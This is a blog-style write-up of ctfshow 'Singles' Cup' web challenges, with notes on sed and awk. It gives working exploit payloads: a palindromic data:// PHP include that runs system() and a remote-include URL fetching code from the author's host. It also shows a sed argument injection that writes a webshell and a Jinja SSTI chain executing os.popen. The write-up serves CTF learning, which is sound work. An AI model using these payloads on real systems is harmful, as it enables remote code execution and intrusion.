[ctfshow Singles' Cup] web writeup & learning the basic usage of sed and awk
2022-06-09 16:18:00 【k_ du1t】
0x00 Preface
I remembered that I never finished the Singles' Cup from a while back, so this is a good moment to reproduce it.
0x01 brain.md
Web Sign-in
<?php
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2022-03-19 12:10:55
# @Last Modified by: h1xa
# @Last Modified time: 2022-03-19 13:27:18
# @email: [email protected]
# @link: https://ctfer.com
error_reporting(0);
highlight_file(__FILE__);
$file = $_POST['file'];
if(isset($file)){
    // the only constraint on the include path: it must read the same backwards
    if(strrev($file)==$file){
        include $file;
    }
}
data:// pseudo-protocol: end the PHP block with ?> and everything after it (the reversed half of the palindrome) is just inert text, so strrev($file)==$file holds while the first half still executes. Both data:// and http:// inclusion require allow_url_include=On.
poc
data://text/plain,<?php system($_GET[1]);?>>?;)]1[TEG_$(metsys php?<,nialp/txet//:atad
file=http://1.15.67.48/data.txt?1==1?txt.atad/84.76.51.1//:ptth&1=whoami
For remote inclusion the reversed half is tucked into the query string after ?, which the server hosting data.txt ignores (1.15.67.48 is the author's own host; data.txt presumably holds the same system($_GET[1]) one-liner). file goes in the POST body and 1=whoami is the GET parameter that $_GET[1] reads; URL-encode the POST value so the ?, & and < characters survive.
easyphp
<?php
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2022-03-19 12:10:55
# @Last Modified by: h1xa
# @Last Modified time: 2022-03-19 13:27:18
# @email: [email protected]
# @link: https://ctfer.com
error_reporting(0);
highlight_file(__FILE__);
$cmd = $_POST['cmd'];
$param = $_POST['param'];
if(isset($cmd) && isset($param)){
    // command: first 3 chars with metacharacters escaped; param: one single-quoted argument;
    // this file's own path is appended as the last argument; the output is discarded
    $cmd=escapeshellcmd(substr($cmd,0,3))." ".escapeshellarg($param)." ".__FILE__;
    shell_exec($cmd);
}
The command is truncated to its first three characters; the parameter can be any length, but it arrives as a single shell argument.
Function reference
escapeshellcmd
(PHP 4, PHP 5, PHP 7, PHP 8)
escapeshellcmd — escape shell metacharacters
escapeshellcmd(string $command): string
escapeshellcmd() escapes any characters in a string that might be used to trick a shell command into executing arbitrary commands. It is meant to be applied to user-supplied data before that data is passed to exec(), system() or the backtick operator. The following characters are preceded by a backslash: &#;`|*?~<>^()[]{}$\, \x0A and \xFF. ' and " are escaped only if they are not paired. On Windows, all of these characters plus % and ! are replaced by a space instead.
escapeshellarg
(PHP 4 >= 4.0.3, PHP 5, PHP 7, PHP 8)
escapeshellarg — escape a string so it can be used as a shell argument
escapeshellarg(string $arg): string
escapeshellarg() adds single quotes around a string and quotes/escapes any existing single quotes, so the string can be passed directly to a shell function and is treated as a single, safe argument. It should be applied to individual user-supplied arguments of shell functions (exec(), system(), the backtick operator).
What this means here: the three-character command cannot be broken out of, and $param cannot be split into several arguments, but nothing stops $param from being a complete script for a three-letter interpreter such as sed or awk, which then runs with __FILE__ (index.php itself) as its input file.
sed
Reference: the sed tutorial (see the references at the end).
Workflow:
read line -> execute -> print -> read line -> execute -> print -> ... -> read line -> execute -> print
sed reads one line at a time from the input stream (file, pipe or standard input) into an internal buffer called the pattern space.
sed also keeps a second buffer in memory, the hold space, where processed data can be stashed for later retrieval. At the end of each cycle the pattern space is cleared, but the hold space is not.
The hold space only stores data; sed commands operate on the pattern space unless data is moved between the two explicitly (h/H/g/G/x).
With an empty script (sed '' file) sed simply prints the input unchanged.
Learning only what is needed here, let's work from the payload.
cmd=sed&param=/esca/d;s/shell_exec/system/g;w 1.php
sed supports regular-expression addresses: /esca/ matches the line containing escapeshellcmd, and d deletes it.
sed commands are separated by ;.
s substitutes a string: shell_exec -> system.
g is the global replacement flag.
The g flag is usually called the global replace flag, and a substitution that uses it is also described as greedy.
Its syntax is
[address1[,address2]]s/search/replacement/g
w writes the pattern space to a file, which here works like a cut-down cp. Note that the file name runs to the end of the script line, so w has to be the last command.
Putting the payload together, the server runs (index.php standing for __FILE__):
sed '/esca/d;s/shell_exec/system/g;w 1.php' index.php
Read index.php, delete the line containing esca..., globally replace the string shell_exec with system,
and finally w write the result to 1.php. Because the escapeshellcmd line is gone, 1.php runs system($_POST['cmd']) on the raw input and echoes the output. w writes relative to the PHP process's working directory, so this only yields a reachable webshell if that directory is the web root.
done
Official expected solution
cmd=sed&param=/php\|POST\|exec/!d;w 1.php
!d deletes every line that does not match php, POST or exec (\| alternation is a GNU sed extension), leaving <?php, the two $_POST assignments and shell_exec($cmd);, and w writes those lines to 1.php.
After reading the tutorial I simplified it to
sed '/php\|POST\|exec/w 2.php' index.php
which writes only the matching lines and gives the same output as 1.php.
awk
Workflow
BEGIN -> read -> execute -> read -> execute -> ... -> read -> execute -> END

As you can see, the BEGIN and END blocks run only once.

The awk command line
The most common way to use awk is to type the script directly on the command line:
awk [options] 'script' file ...
On the command line the awk code must be enclosed in single quotes ('') so the shell does not interpret it.
For example
awk '{print}' employee.txt
prints the source file unchanged.
Again, let's start from the payload.
It turns out awk can execute commands directly:
awk '{system("whoami")}' index.php

(system() is called once per input line, so whoami runs once for every line of index.php.)
But the output is not visible on the web side, because shell_exec's return value is discarded.
So rather than echoing, write a file directly, either with awk's own output redirection (print ... > "file") or by redirecting inside the system() command.
References
https://www.twle.cn/c/yufei/sed/sed-basic-regular-expressions.html
http://landasika.top/2022/05/25/ctfshow-dan-shen-bei/#web2_easyPHP
Marriage Test
/source gives the hint:
waf
def is_hacker(string):
    """What good are all those fancy WAFs? None beats this one: it kills SSTI outright."""
    # per-parameter check: only a single value containing both braces is rejected
    if "{" in string and "}" in string:
        return True
    else:
        return False
The check is applied to each parameter on its own and only fires when one value contains both { and }, so split the braces between the two parameters boy_name and girl_name. A single quote at the seam turns whatever text the template places between the two values into a string literal, and the attribute chain is then hung off that literal. The subclass index 81 depends on the target's Python version and loaded modules, so enumerate __subclasses__() first if it does not land on a usable class.
poc:
/result?boy_name={{'&girl_name='.__class__.__base__.__subclasses__()[81].__init__.__globals__.__import__('os').popen('whoami').read()}}

blog
Java (加瓦) or whatever it is, definitely next time.
This gap has to be filled!
0x02 Rethink
Java, Java, Java.